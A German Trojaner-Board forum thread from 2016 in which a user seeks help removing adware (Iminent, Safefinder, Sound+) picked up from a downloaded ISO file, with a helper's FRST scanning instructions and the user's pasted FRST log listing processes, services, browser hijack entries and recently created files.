Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Windows 10: Iminent/Safefinder uninstallierbar (https://www.trojaner-board.de/175699-windows-10-iminent-safefinder-uninstallierbar.html)

blop111 04.02.2016 17:30
Windows 10: Iminent/Safefinder uninstallierbar
 
Hi,

wollte gestern mir ein Lied downloaden und hab dabei eine iso-Datei runtergeladen. Es hat sich dann herausgetsellt, dass die iso-Datei eine Malware ist -.-
Plötzlich hatte ich Sound+ oder so etwas in der Art auf dem PC installiert und dazu noch einige andere Programme.
Habe daraufhin den Computer im abgesicherten Modus neugestartet und Sound+ deinstallierert, einige andere Programme konnte ich aber nicht deinstallieren, unter anderem "Iminent" und "Safefinder" :wtf: :confused:
Das Programm "Malwarebytes Anti Malware" habe ich bereits installiert und auch einen Suchlauf gestartet (mit dem Hacken bei Rootkits).

Weiß jetzt nicht was ich tun soll :confused:

Hoffe ihr könnt mir helfen....

LG


EDIT: Muss noch anmerken, dass ständig neue Programme von selbst installiert werden -.-
Der Suchlauf des Anti-Malware Programms ist jetzt beendet, 969 erkannte Bedrohungen...soll ich auf "Auswahl entfernen" klicken ?

EDIT 2:Glaube das Problem hat sich gelöst. Nachdem ich die erkannten Bedrohungen durch das Programm "Malwarebytes Anti-Malware" entfernt habe, hat sich der PC neugestartet und hatte dann die beiden Programme Iminent und Safefinder nicht mehr. Auch installieren sich jetzt keine weiteren Programme eigenständig.

deeprybka 04.02.2016 21:00
:hallo:

Mein Name ist Jürgen und ich werde Dir bei Deinem Problem behilflich sein. Zusammen schaffen wir das...:abklatsch:
  • Bitte arbeite alle Schritte der Reihe nach ab.
  • Lies die Anleitungen sorgfältig durch bevor Du beginnst. Wenn es Probleme gibt oder Du etwas nicht verstehst, dann stoppe mit Deiner Ausführung und beschreibe mir das Problem.
  • Führe bitte nur Scans durch, zu denen Du von mir aufgefordert wurdest.
  • Bitte kein Crossposting (posten in mehreren Foren).
  • Installiere oder deinstalliere während der Bereinigung keine Software, außer Du wurdest dazu aufgefordert.
  • Speichere alle unsere Tools auf dem Desktop ab. Link: So ladet Ihr unsere Tools richtig
  • Poste die Logfiles direkt in Deinen Thread in Code-Tags.
  • Bedenke, dass wir hier alle während unserer Freizeit tätig sind, wenn du innerhalb von 24 Stunden nichts von mir liest, dann schreibe mir bitte eine PM.

Hinweis:
Ich kann Dir niemals eine Garantie geben, dass wir alle schädlichen Dateien finden werden.
Eine Formatierung ist meist der schnellere und immer der sicherste Weg, aber auch nur bei wirklicher Malware empfehlenswert.
Adware & Co. können wir sehr gut entfernen.
Solltest Du Dich für eine Bereinigung entscheiden, arbeite solange mit, bis Du mein clean :daumenhoc bekommst.



Los geht's:

Schritt 1
http://filepony.de/icon/frst.pnghttp://deeprybka.trojaner-board.de/b...e/frst/sn1.PNG

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)




Lesestoff
Posten in CODE-Tags: So gehts...
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert uns massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://deeprybka.trojaner-board.de/tdss/codetags.gif

blop111 04.02.2016 21:09
Hier die Logfiles:

FRST

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
durchgeführt von Deniz (Administrator) auf DENIZPC (04-02-2016 21:04:32)
Gestartet von C:\Users\Deniz\Downloads
Geladene Profile: Deniz (Verfügbare Profile: Deniz)
Platform: Windows 10 Pro Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
() C:\Program Files (x86)\ASRock Utility\APP Shop\AsrAPPShop.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.266\SSScheduler.exe
(AVM Berlin) C:\Program Files (x86)\avmwlanstick\FRITZWLANMini.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
() C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1601.49020.0_x64__8wekyb3d8bbwe\Calculator.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.122.14020.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
() C:\Users\Deniz\AppData\Local\03000200-1454615591-0500-0006-000700080009\qnsv657B.tmp
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2757424 2015-11-25] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [AVMWlanClient] => C:\Program Files (x86)\avmwlanstick\FRITZWLANMini.exe [933888 2012-08-21] (AVM Berlin)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565448 2015-11-12] (LogMeIn Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation)
HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50615936 2016-01-18] (Skype Technologies S.A.)
HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\...\MountPoints2: {036d3491-9af2-11e5-824f-d050992145d7} - "E:\pushinst.exe"
HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\...\MountPoints2: {bdd6f479-aaa2-11e5-8256-d050992145d7} - "F:\setup.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2016-02-04]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.266\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\..\Interfaces\{2155ceb0-fbfa-41d1-9c18-56bab75ceac0}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_71\bin\ssv.dll [2016-01-25] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-25] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
IE Session Restore: HKU\S-1-5-21-3986097363-2624585822-4063065306-1001 -> ist aktiviert.
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Deniz\AppData\Roaming\Mozilla\Firefox\Profiles\dp0jg67k.default
FF NewTab: hxxp://www.trovi.com/?gd=&ctid=CT3333673&octid=EB_ORIGINAL_CTID&ISID=FDCF40E1-99DE-4FA5-9DE2-D0CE81FA918F&SearchSource=69&CUI=&SSPV=&Lay=1&UM=8&UP=SP6156EC37-0ECD-4F13-9225-A65CD526B089&D=122415
FF SelectedSearchEngine: StartWeb
FF Homepage: hxxps://www.google.de
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] ()
FF Plugin: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-25] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-25] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1223183.dll [2015-12-22] (Adobe Systems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-11-24] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-11-24] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3986097363-2624585822-4063065306-1001: sony.com/MediaGoDetector -> C:\Program Files (x86)\Sony\Media Go\npMediaGoDetector.dll [2015-11-20] (Sony Network Entertainment International LLC)
FF SearchPlugin: C:\Users\Deniz\AppData\Roaming\Mozilla\Firefox\Profiles\dp0jg67k.default\searchplugins\google-images.xml [2015-12-06]
FF SearchPlugin: C:\Users\Deniz\AppData\Roaming\Mozilla\Firefox\Profiles\dp0jg67k.default\searchplugins\google-maps.xml [2015-12-06]
FF SearchPlugin: C:\Users\Deniz\AppData\Roaming\Mozilla\Firefox\Profiles\dp0jg67k.default\searchplugins\youtube.xml [2015-12-06]
FF Extension: Adblock Plus - C:\Users\Deniz\AppData\Roaming\Mozilla\Firefox\Profiles\dp0jg67k.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-19]
FF Extension: Skype - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR HomePage: Default -> search.mpc.am
CHR StartupUrls: Default -> "search.mpc.am"
CHR DefaultSearchURL: Default -> hxxp://search.mpc.am?q={searchTerms}&cx=partner-pub-3796753109442372:3837783968
CHR DefaultSearchKeyword: Default -> mpc safe search
CHR Profile: C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-01-14]
CHR Extension: (Google Docs) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-14]
CHR Extension: (Google Drive) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-14]
CHR Extension: (YouTube) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-14]
CHR Extension: (Google Search) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-14]
CHR Extension: (Google Sheets) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-01-13]
CHR Extension: (Google Docs Offline) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-14]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-13]
CHR Extension: (Gmail) - C:\Users\Deniz\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-14]
CHR HKLM-x32\...\Chrome\Extension: [ihenkjeihefokohmemphikjnjbmegdik] - "C:\Program Files (x86)\Sony\Media Go\MediaGoDetector.crx" <nicht gefunden>
CHR HKLM-x32\...\Chrome\Extension: [olghjjajidfdflkafeekiojnfmiolccp] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - Chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1257504 2015-12-10] ()
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1156400 2015-11-25] (NVIDIA Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1872688 2015-11-25] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [8133424 2015-11-25] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5915440 2015-11-25] (NVIDIA Corporation)
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76888 2016-02-03] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
R2 zigipyro; C:\Users\Deniz\AppData\Local\03000200-1454615591-0500-0006-000700080009\qnsv657B.tmp [158720 2015-12-26] () [Datei ist nicht signiert]
S2 Santom; C:\ProgramData\\Santom\\Santom.exe shuz -f "C:\ProgramData\\Santom\\Santom.dat" -l -a

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AsrAutoChkUpdDrv; C:\WINDOWS\SysWOW64\Drivers\AsrAutoChkUpdDrv.sys [22280 2016-02-04] (ASRock Incorporation)
S3 AxtuDrv; C:\WINDOWS\SysWOW64\Drivers\AxtuDrv.sys [21288 2015-12-05] (RW-Everything)
R3 fwlanusb5; C:\Windows\system32\DRIVERS\fwlanusb5.sys [982784 2012-08-21] (AVM GmbH)
R3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-08-03] (LogMeIn Inc.)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [193336 2015-07-10] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19760 2015-11-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [50472 2015-11-25] (NVIDIA Corporation)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S1 bqxhipyx; \??\C:\WINDOWS\system32\drivers\bqxhipyx.sys [X]
S1 MPCKpt; system32\DRIVERS\MPCKpt.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-04 21:04 - 2016-02-04 21:05 - 00015156 _____ C:\Users\Deniz\Downloads\FRST.txt
2016-02-04 21:04 - 2016-02-04 21:04 - 00000000 ____D C:\FRST
2016-02-04 21:03 - 2016-02-04 21:03 - 02370560 _____ (Farbar) C:\Users\Deniz\Downloads\FRST64.exe
2016-02-04 19:53 - 2016-02-04 19:53 - 00000000 ____D C:\Users\Deniz\AppData\Local\03000200-1454615591-0500-0006-000700080009
2016-02-04 17:07 - 2016-02-04 17:51 - 00001169 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-02-04 17:07 - 2016-02-04 17:08 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-02-04 17:07 - 2016-02-04 17:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-02-04 17:07 - 2016-02-04 17:07 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-04 17:07 - 2016-02-04 17:07 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-02-04 17:07 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-02-04 17:07 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-02-04 17:07 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-02-04 17:06 - 2016-02-04 17:07 - 22908888 _____ (Malwarebytes ) C:\Users\Deniz\Downloads\mbam-setup-2.2.0.1024.exe
2016-02-04 16:46 - 2016-02-04 16:46 - 00019166 ____H C:\WINDOWS\Tasks\{080A0B47-0E05-0D05-7D11-7A097879110D}.job
2016-02-04 16:46 - 2016-02-04 16:46 - 00000000 ____D C:\ProgramData\33adaafd-39e3-1
2016-02-04 16:38 - 2016-02-04 16:59 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-02-04 16:37 - 2016-02-04 16:37 - 00000000 ____D C:\WINDOWS\pss
2016-02-03 23:35 - 2016-02-04 17:51 - 00001159 _____ C:\Users\Deniz\Desktop\Continue Last version Installation.lnk
2016-02-03 22:37 - 2016-02-04 17:51 - 00001244 _____ C:\Users\Deniz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome .lnk
2016-02-03 22:37 - 2016-02-04 17:51 - 00001214 _____ C:\Users\Deniz\Desktop\Chrome .lnk
2016-02-03 22:37 - 2016-02-04 17:51 - 00000998 _____ C:\Users\Deniz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefox .lnk
2016-02-03 22:37 - 2016-02-04 17:51 - 00000968 _____ C:\Users\Deniz\Desktop\Firefox .lnk
2016-02-03 22:37 - 2016-02-04 17:51 - 00000920 _____ C:\Users\Deniz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Iexplore .lnk
2016-02-03 22:37 - 2016-02-04 17:51 - 00000890 _____ C:\Users\Deniz\Desktop\Iexplore .lnk
2016-02-03 22:07 - 2016-02-03 22:08 - 00000008 _____ C:\END
2016-02-03 22:03 - 2016-02-03 22:03 - 00000000 ____D C:\WINDOWS\LastGood
2016-02-03 22:00 - 2016-02-03 22:00 - 00003714 _____ C:\WINDOWS\System32\Tasks\{29A8F8E2-4080-4930-BA92-BEE5FF804B2E}
2016-02-03 21:59 - 2016-02-03 21:59 - 00003244 _____ C:\WINDOWS\System32\Tasks\{267229C2-F9E7-458D-BCF0-A5980456C347}
2016-02-03 21:54 - 2016-02-04 17:43 - 00000000 ____D C:\Users\Deniz\AppData\LocalLow\Company
2016-02-03 21:54 - 2016-02-04 17:43 - 00000000 ____D C:\Program Files (x86)\MPC Cleaner
2016-02-03 21:54 - 2016-02-03 21:54 - 00022690 _____ C:\WINDOWS\System32\Tasks\{080A0B47-0E05-0D05-7D11-7A097879110D}
2016-02-03 21:54 - 2016-02-03 21:54 - 00003404 _____ C:\WINDOWS\System32\Tasks\Uymhnhth
2016-02-03 21:54 - 2016-02-03 21:54 - 00000074 _____ C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
2016-02-03 21:54 - 2016-02-03 21:54 - 00000000 ____D C:\ProgramData\33adaafd-3c77-1
2016-02-03 21:54 - 2016-02-03 21:54 - 00000000 ____D C:\ProgramData\33adaafd-1aa3-0
2016-02-03 21:53 - 2016-02-04 17:43 - 00000000 ____D C:\Program Files\Sound+
2016-02-03 21:53 - 2016-02-04 16:32 - 00023208 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-02-03 21:53 - 2016-02-03 21:53 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-02-03 21:53 - 2016-02-03 21:53 - 00003304 _____ C:\WINDOWS\System32\Tasks\runTask
2016-02-03 21:53 - 2016-02-03 21:53 - 00003214 _____ C:\WINDOWS\System32\Tasks\updateTask
2016-02-03 21:53 - 2016-02-03 21:53 - 00002044 _____ C:\WINDOWS\System32\Tasks\zyh3018
2016-02-03 21:44 - 2016-02-03 21:43 - 00001140 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-02-03 21:43 - 2016-02-04 17:47 - 00000000 ____D C:\ProgramData\Santom
2016-02-03 21:40 - 2016-02-03 21:40 - 00000000 ____D C:\Users\Deniz\AppData\Roaming\Sony Corporation
2016-02-03 21:39 - 2016-02-04 17:51 - 00001952 _____ C:\Users\Public\Desktop\Media Go.lnk
2016-02-03 21:39 - 2016-02-03 21:40 - 00000000 ____D C:\Users\Deniz\AppData\Local\Sony
2016-02-03 21:39 - 2016-02-03 21:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sony
2016-02-03 21:37 - 2016-02-03 21:39 - 00000000 ____D C:\Program Files (x86)\Sony Media Go Install
2016-02-03 21:36 - 2016-02-03 21:39 - 00000000 ____D C:\Users\Deniz\AppData\Roaming\Sony
2016-02-03 21:35 - 2016-02-04 17:51 - 00002202 _____ C:\Users\Public\Desktop\NWZ-W270S WALKMAN Guide.lnk
2016-02-03 21:35 - 2016-02-03 21:35 - 00000000 ____D C:\Users\Deniz\AppData\Local\Downloaded Installations
2016-02-03 21:35 - 2016-02-03 21:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WALKMAN Guide
2016-02-03 21:34 - 2016-02-03 21:40 - 00000000 ____D C:\ProgramData\Sony Corporation
2016-02-03 21:34 - 2016-02-03 21:39 - 00000000 ____D C:\Program Files (x86)\Sony
2016-01-30 00:57 - 2016-01-30 00:57 - 00000000 ____D C:\Users\Deniz\Documents\League of Legends
2016-01-29 02:53 - 2016-01-29 02:53 - 01409282 ____R C:\Users\Deniz\Desktop\I-S-T2000R_TEST.PDF
2016-01-29 02:20 - 2016-01-29 02:20 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2016-01-28 18:31 - 2016-01-16 07:23 - 08728920 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-01-28 18:31 - 2016-01-16 07:20 - 06971752 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-01-28 18:31 - 2016-01-16 06:44 - 22394368 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-01-28 18:30 - 2016-01-16 07:37 - 00202472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-01-28 18:30 - 2016-01-16 07:36 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-01-28 18:30 - 2016-01-16 07:36 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-01-28 18:30 - 2016-01-16 07:34 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-01-28 18:30 - 2016-01-16 07:24 - 00538632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-01-28 18:30 - 2016-01-16 07:23 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
